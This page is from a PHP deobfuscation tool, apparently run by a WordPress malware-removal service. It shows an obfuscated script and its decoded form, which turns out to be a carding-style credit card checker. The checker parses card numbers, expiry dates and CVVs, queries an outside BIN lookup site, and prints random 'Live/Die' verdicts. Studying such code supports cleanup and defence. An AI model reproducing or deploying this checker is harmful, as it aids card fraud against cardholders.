Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php ${"G\x4cOBA\x4c\x53"}["\x6b\x62x\x73\x66mny\x6a\x6fw\x6f"]="\x63ct\x79\x70\x65";${"GL\x4f\x42\x41LS"}["\x78\x6ex\x76\x6dr\x69f\x70\x70\x74"]="\x72\x61n\x64";${"\x47\x4c\x4fB\x41\x4c\x53"}["t\x75bg\x70\x78s\x62\x66ewq"]="\x63\x63\x6blas";${"\x47\x4cOB\x41\x4c\x53"}["\x78d\x64hf\x66\x77\x71\x...



Obfuscated php code

<?php ${"G\x4cOBA\x4c\x53"}["\x6b\x62x\x73\x66mny\x6a\x6fw\x6f"]="\x63ct\x79\x70\x65";${"GL\x4f\x42\x41LS"}["\x78\x6ex\x76\x6dr\x69f\x70\x70\x74"]="\x72\x61n\x64";${"\x47\x4c\x4fB\x41\x4c\x53"}["t\x75bg\x70\x78s\x62\x66ewq"]="\x63\x63\x6blas";${"\x47\x4cOB\x41\x4c\x53"}["\x78d\x64hf\x66\x77\x71\x71o\x66"]="\x63\x63\x62ra\x6ed";${"G\x4c\x4fB\x41\x4c\x53"}["\x78\x67t\x69q\x75q\x66\x6a\x65"]="\x6eam\x61\x62nk";${"G\x4c\x4f\x42\x41L\x53"}["\x77\x78\x72\x6b\x77z\x6coe"]="\x67e\x74ba\x6e\x6b";${"G\x4c\x4f\x42\x41L\x53"}["\x6c\x66bq\x75\x74t\x6c"]="\x6aen\x69s\x63c";${"G\x4c\x4f\x42\x41\x4cS"}["rh\x76\x75unp\x76\x70"]="b\x69\x6e";${"G\x4c\x4f\x42\x41\x4c\x53"}["w\x6fz\x62\x75ndy"]="f\x6f\x72\x6d\x61\x74";${"\x47LO\x42\x41\x4c\x53"}["\x71\x6b\x61m\x78\x75\x72"]="\x65\x78py";${"\x47\x4c\x4f\x42A\x4c\x53"}["o\x6ch\x72c\x6e\x67bwr"]="e\x78\x70\x6d";${"\x47\x4cO\x42ALS"}["\x6b\x76\x73o\x78\x77\x77\x65\x77\x69\x6b"]="n\x75\x6d";${"\x47LO\x42A\x4c\x53"}["\x70\x6b\x64\x6a\x73\x72\x67\x6f\x65\x6f\x64"]="\x64a\x74\x61\x73";${"GLOBALS"}["r\x74a\x6b\x7a\x65\x67"]="\x64\x61\x74a";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x72\x74\x61\x6bz\x65g"]}=$_POST["\x64a\x74\x61"];if(!empty($_POST["\x64\x61t\x61"])){${"\x47L\x4f\x42\x41\x4c\x53"}["ti\x66\x76s\x6c\x68b\x73\x75"]="\x65\x78p\x79";${"\x47\x4cO\x42\x41\x4c\x53"}["je\x73x\x6e\x6cl\x6c\x67g\x79"]="d\x61t\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["o\x71\x69\x69\x69\x6a"]="\x64\x61t\x61s";${"GL\x4fB\x41\x4c\x53"}["\x73e\x61r\x67yf"]="\x64\x61\x74\x61\x73";$cohssrfjye="\x65\x78\x70\x6d";preg_match("#^[\\\x64]{\x316}\x5c|[\x5c\x64]{\x32}\x5c|[\x5c\x64]{4}\x5c|[\x5c\x64]{\x33}\$#",${${"\x47\x4c\x4f\x42ALS"}["jes\x78\x6e\x6c\x6c\x6cg\x67y"]},${${"GL\x4fB\x41LS"}["\x73e\x61r\x67yf"]});${${"\x47\x4cO\x42\x41\x4cS"}["pk\x64\x6a\x73\x72\x67\x6f\x65\x6f\x64"]}=explode("|",${${"\x47L\x4f\x42A\x4c\x53"}["\x70k\x64\x6a\x73\x72g\x6f\x65o\x64"]}[0]);$miakmmpzglv="\x64a\x74\x61\x73";${"\x47L\x4f\x42\x41L\x53"}["\x6bd\x66\x70\x7awm\x6a"]="da\x74a\x73";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6b\x76\x73\x6fxwwe\x77\x69\x6b"]}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x70\x6b\x64\x6a\x73rg\x6f\x65\x6f\x64"]}[0];${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x78\x73\x6aiq\x6e\x6e\x66"]="\x65\x78\x70\x79";$yepgerkhboxc="\x63\x76v";${${"\x47L\x4f\x42\x41\x4cS"}["o\x6c\x68rc\x6e\x67\x62w\x72"]}=${${"\x47L\x4f\x42\x41\x4c\x53"}["kdfp\x7aw\x6d\x6a"]}[1];$kheclh="\x63\x76\x76";${${"\x47\x4cOB\x41L\x53"}["\x71k\x61m\x78ur"]}=${$miakmmpzglv}[2];${$kheclh}=${${"\x47\x4cOB\x41L\x53"}["o\x71\x69\x69\x69\x6a"]}[3];${${"\x47\x4c\x4f\x42AL\x53"}["w\x6f\x7a\x62\x75n\x64\x79"]}=${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6b\x76s\x6f\x78ww\x65w\x69k"]}."|".${$cohssrfjye}."|".${${"\x47\x4cO\x42\x41L\x53"}["\x74\x78sji\x71\x6e\x6e\x66"]}."|".${$yepgerkhboxc};if(${${"\x47\x4c\x4f\x42\x41LS"}["\x74\x69fvs\x6c\x68b\x73\x75"]}>=2017&&${${"GL\x4fB\x41\x4c\x53"}["\x6fl\x68r\x63n\x67b\x77r"]}<=12){${"\x47\x4cOB\x41L\x53"}["\x76\x6ay\x7aq\x75\x71\x66\x65f"]="g\x65\x74\x62\x61\x6e\x6b";$xknuxrz="\x62\x69\x6e";${${"\x47\x4cO\x42\x41L\x53"}["\x72hvu\x75\x6e\x70\x76p"]}=${${"\x47\x4c\x4f\x42AL\x53"}["k\x76s\x6f\x78w\x77\x65\x77\x69\x6b"]};${"\x47\x4c\x4f\x42AL\x53"}["f\x63nom\x6d\x63\x76"]="\x72\x61\x6e\x64";$aygehjeyype="\x62in";$qmnjgkftwxr="\x72a\x6e\x64";${$xknuxrz}=substr(${${"G\x4c\x4f\x42AL\x53"}["\x72h\x76\x75\x75\x6e\x70v\x70"]},0,6);${"\x47\x4c\x4f\x42\x41LS"}["\x7ahq\x71\x64m\x76\x62\x6fh\x6a"]="\x72\x61\x6e\x64";${"\x47\x4c\x4f\x42\x41L\x53"}["\x61k\x6b\x73\x6d\x6c\x73"]="\x6e\x61m\x61\x62n\x6b";$qovsrjkj="\x62\x69\x6e";$jeenvfvi="\x6ae\x6e\x69\x73c\x63";${${"\x47L\x4f\x42A\x4c\x53"}["v\x6a\x79\x7aq\x75qf\x65\x66"]}=explode(${$aygehjeyype},file_get_contents("ht\x74\x70://bi\x6es.pr\x6f/\x73e\x61\x72\x63\x68?act\x69\x6fn\x3d\x73\x65a\x72c\x68\x62i\x6e\x73\x26b\x69\x6es\x3d".${$qovsrjkj}."\x26ban\x6b\x3d\x26co\x75\x6e\x74ry\x3d"));${${"\x47\x4c\x4f\x42\x41LS"}["\x6cf\x62\x71u\x74t\x6c"]}=explode("</\x74d\x3e\x3ct\x64>",${${"GL\x4f\x42\x41\x4c\x53"}["\x77\x78rk\x77zl\x6f\x65"]}[2]);$ysiynzefgq="\x63c\x74\x79p\x65";${${"\x47\x4cOBA\x4c\x53"}["\x78g\x74\x69\x71\x75qf\x6a\x65"]}=explode("\x3c/\x74d>\x3c/\x74r\x3e",${$jeenvfvi}[5]);${"\x47\x4cO\x42AL\x53"}["u\x73k\x6d\x72js"]="ra\x6e\x64";$stmsvel="\x63\x63\x62\x61\x6e\x6b";${${"\x47LO\x42\x41L\x53"}["\x78\x64\x64h\x66fwqqo\x66"]}=${${"\x47\x4c\x4fBAL\x53"}["\x6c\x66b\x71ut\x74\x6c"]}[2];${$stmsvel}=${${"\x47\x4cO\x42A\x4c\x53"}["a\x6bk\x73m\x6c\x73"]}[0];${$ysiynzefgq}=${${"\x47L\x4fB\x41\x4c\x53"}["lf\x62qu\x74tl"]}[3];${${"G\x4cOB\x41LS"}["\x74\x75b\x67\x70\x78\x73b\x66\x65\x77q"]}=${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6cf\x62q\x75t\x74\x6c"]}[4];${${"\x47\x4c\x4f\x42A\x4cS"}["\x78\x6e\x78v\x6drif\x70p\x74"]}=rand(1,5);if(${${"\x47L\x4fBA\x4cS"}["\x75\x73\x6b\x6d\x72j\x73"]}==1){$jntqyrt="\x63c\x62\x72\x61\x6ed";${"G\x4c\x4f\x42\x41\x4c\x53"}["a\x67\x6e\x6ak\x64\x61e\x6d"]="\x63c\x62\x61\x6e\x6b";echo"{\x22\x65\x72ro\x72\":\x31,\"m\x73\x67\":\x22<\x64iv>\x3c\x62\x20s\x74\x79\x6ce\x3d'\x63ol\x6f\x72:\x23\x300\x38\x30\x300\x3b'>\x4c\x69v\x65\x3c/b>\x20| ".${${"G\x4c\x4f\x42\x41LS"}["\x77\x6f\x7a\x62und\x79"]}." [B\x49N:\x20<\x62 \x73\x74yl\x65=\x27col\x6fr:bl\x75e;\x27>".${$jntqyrt}."\x3c/\x62\x3e\x3cb\x20\x73ty\x6c\x65='\x63\x6f\x6c\x6f\x72:\x72ed\x3b'> -\x20</\x62>\x3cb\x20\x73\x74yl\x65\x3d'color:b\x6cue\x3b'\x3e".${${"\x47LOB\x41\x4c\x53"}["\x61g\x6ejk\x64\x61\x65m"]}."\x3c/b\x3e\x3cb\x20s\x74\x79\x6ce\x3d'c\x6flo\x72:r\x65\x64;'>\x20-\x20\x3c/b\x3e\x3cb \x73tyle\x3d\x27\x63\x6f\x6cor:b\x6cu\x65;\x27\x3e".${${"G\x4c\x4f\x42A\x4c\x53"}["kb\x78s\x66\x6d\x6e\x79jo\x77\x6f"]}."\x3c/b><\x62 st\x79l\x65=\x27\x63o\x6c\x6fr:\x72\x65\x64\x3b'> - \x3c/b><\x62 st\x79l\x65=\x27c\x6fl\x6f\x72:blu\x65;'\x3e".${${"\x47L\x4f\x42\x41\x4c\x53"}["\x74u\x62\x67p\x78\x73\x62\x66\x65w\x71"]}."\x3c/\x62>] $0.5 Checked - Shinji\x3c/d\x69\x76\x3e\x22}";}elseif(${$qmnjgkftwxr}==2){echo"{\"e\x72\x72or\":\x32,\x22\x6dsg\x22:\x22\x3c\x64iv><\x62\x20\x73ty\x6ce\x3d\x27\x63olor:#\x46F\x300\x30\x30;'>\x44\x69\x65</b\x3e |\x20".${${"\x47L\x4fB\x41\x4c\x53"}["\x77o\x7a\x62un\x64\x79"]}."\x20[GAT\x45:01]\x20\x40/Checked - Shinji\x3c/div\x3e\"}";}elseif(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x66c\x6e\x6f\x6d\x6dc\x76"]}==3){${"G\x4c\x4f\x42AL\x53"}["anol\x64w\x65"]="f\x6fr\x6d\x61\x74";echo"{\x22error\":3,\"ms\x67\":\"\x3c\x64\x69\x76><b\x20styl\x65='\x63o\x6c\x6f\x72:\x238000\x380\x3b'>\x55n\x6bn\x6fwn\x3c/b\x3e | ".${${"\x47LO\x42\x41L\x53"}["a\x6e\x6f\x6cd\x77\x65"]}." |\x20[G\x41\x54\x45:01]\x20\x40/C\x68k\x4e\x45\x54-ID</\x64iv>\"}";}elseif(${${"G\x4c\x4fB\x41\x4c\x53"}["\x7a\x68q\x71\x64\x6dv\x62\x6f\x68j"]}==4){echo"{\x22e\x72\x72o\x72\":2,\"\x6d\x73g\":\x22<d\x69v\x3e\x3c\x62 s\x74\x79l\x65='\x63ol\x6fr:#F\x460000;\x27\x3e\x44\x69\x65\x3c/\x62>\x20|\x20".${${"\x47\x4cO\x42A\x4c\x53"}["\x77\x6fz\x62\x75n\x64\x79"]}."\x20[G\x41TE:\x301]\x20@/C\x68\x6b\x4eET-\x49D</\x64iv\x3e\x22}";}elseif(${${"G\x4c\x4f\x42\x41\x4cS"}["\x78n\x78\x76\x6d\x72i\x66\x70p\x74"]}==5){${"\x47\x4c\x4f\x42A\x4c\x53"}["li\x6eq\x62\x63\x67j\x61"]="fo\x72m\x61\x74";echo"{\x22e\x72ror\":3,\"\x6d\x73\x67\":\"<d\x69v>\x3c\x62 s\x74yl\x65\x3d\x27co\x6c\x6fr:\x23\x380\x300\x38\x30\x3b'\x3eUn\x6b\x6eow\x6e</b\x3e\x20|\x20".${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6c\x69\x6eq\x62c\x67\x6a\x61"]}."\x20|\x20[\x47A\x54E:0\x31]\x20\x40/\x43\x68\x6b\x4e\x45\x54-I\x44\x3c/d\x69\x76\x3e\x22}";}}else{$qrblsuynnj="\x66o\x72\x6d\x61\x74";echo"{\x22\x65\x72\x72\x6f\x72\":4,\"ms\x67\x22:\x22\x3c\x62>\x43\x68\x65ck\x20th\x65\x20\x76\x61lidi\x74\x79\x20o\x66 \x61 credi\x74\x20ca\x72\x64</b\x3e | ".${$qrblsuynnj}." [GAT\x45:\x301]\x20\x40/Checked - Shinji\x22}";}}
?>

Decoded(de-Obfuscated) php code

<?php

$GLOBALS["kbxsfmnyjowo"] = "cctype";
$GLOBALS["xnxvmrifppt"] = "rand";
$GLOBALS["tubgpxsbfewq"] = "ccklas";
$GLOBALS["xddhffwqqof"] = "ccbrand";
$GLOBALS["xgtiquqfje"] = "namabnk";
$GLOBALS["wxrkwzloe"] = "getbank";
$GLOBALS["lfbquttl"] = "jeniscc";
$GLOBALS["rhvuunpvp"] = "bin";
$GLOBALS["wozbundy"] = "format";
$GLOBALS["qkamxur"] = "expy";
$GLOBALS["olhrcngbwr"] = "expm";
$GLOBALS["kvsoxwwewik"] = "num";
$GLOBALS["pkdjsrgoeod"] = "datas";
$GLOBALS["rtakzeg"] = "data";
$data = $_POST["data"];
if (!empty($_POST["data"])) {
    $GLOBALS["tifvslhbsu"] = "expy";
    $GLOBALS["jesxnlllggy"] = "data";
    $GLOBALS["oqiiij"] = "datas";
    $GLOBALS["seargyf"] = "datas";
    $cohssrfjye = "expm";
    preg_match("#^[\\d]{16}\\|[\\d]{2}\\|[\\d]{4}\\|[\\d]{3}\$#", $data, $datas);
    $datas = explode("|", $datas[0]);
    $miakmmpzglv = "datas";
    $GLOBALS["kdfpzwmj"] = "datas";
    $num = $datas[0];
    $GLOBALS["txsjiqnnf"] = "expy";
    $yepgerkhboxc = "cvv";
    $expm = $datas[1];
    $kheclh = "cvv";
    $expy = $datas[2];
    $cvv = $datas[3];
    $format = $num . "|" . $expm . "|" . $expy . "|" . $cvv;
    if ($expy >= 2017 && $expm <= 12) {
        $GLOBALS["vjyzquqfef"] = "getbank";
        $xknuxrz = "bin";
        $bin = $num;
        $GLOBALS["fcnommcv"] = "rand";
        $aygehjeyype = "bin";
        $qmnjgkftwxr = "rand";
        $bin = substr($bin, 0, 6);
        $GLOBALS["zhqqdmvbohj"] = "rand";
        $GLOBALS["akksmls"] = "namabnk";
        $qovsrjkj = "bin";
        $jeenvfvi = "jeniscc";
        $getbank = explode($bin, file_get_contents("http://bins.pro/search?action=searchbins&bins=" . $bin . "&bank=&country="));
        $jeniscc = explode("</td><td>", $getbank[2]);
        $ysiynzefgq = "cctype";
        $namabnk = explode("</td></tr>", $jeniscc[5]);
        $GLOBALS["uskmrjs"] = "rand";
        $stmsvel = "ccbank";
        $ccbrand = $jeniscc[2];
        $ccbank = $namabnk[0];
        $cctype = $jeniscc[3];
        $ccklas = $jeniscc[4];
        $rand = rand(1, 5);
        if ($rand == 1) {
            $jntqyrt = "ccbrand";
            $GLOBALS["agnjkdaem"] = "ccbank";
            echo "{\"error\":1,\"msg\":\"<div><b style='color:#008000;'>Live</b> | " . $format . " [BIN: <b style='color:blue;'>" . $ccbrand . "</b><b style='color:red;'> - </b><b style='color:blue;'>" . $ccbank . "</b><b style='color:red;'> - </b><b style='color:blue;'>" . $cctype . "</b><b style='color:red;'> - </b><b style='color:blue;'>" . $ccklas . "</b>] \$0.5 Checked - Shinji</div>\"}";
        } elseif ($rand == 2) {
            echo "{\"error\":2,\"msg\":\"<div><b style='color:#FF0000;'>Die</b> | " . $format . " [GATE:01] @/Checked - Shinji</div>\"}";
        } elseif ($rand == 3) {
            $GLOBALS["anoldwe"] = "format";
            echo "{\"error\":3,\"msg\":\"<div><b style='color:#800080;'>Unknown</b> | " . $format . " | [GATE:01] @/ChkNET-ID</div>\"}";
        } elseif ($rand == 4) {
            echo "{\"error\":2,\"msg\":\"<div><b style='color:#FF0000;'>Die</b> | " . $format . " [GATE:01] @/ChkNET-ID</div>\"}";
        } elseif ($rand == 5) {
            $GLOBALS["linqbcgja"] = "format";
            echo "{\"error\":3,\"msg\":\"<div><b style='color:#800080;'>Unknown</b> | " . $format . " | [GATE:01] @/ChkNET-ID</div>\"}";
        }
    } else {
        $qrblsuynnj = "format";
        echo "{\"error\":4,\"msg\":\"<b>Check the validity of a credit card</b> | " . $format . " [GATE:01] @/Checked - Shinji\"}";
    }
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.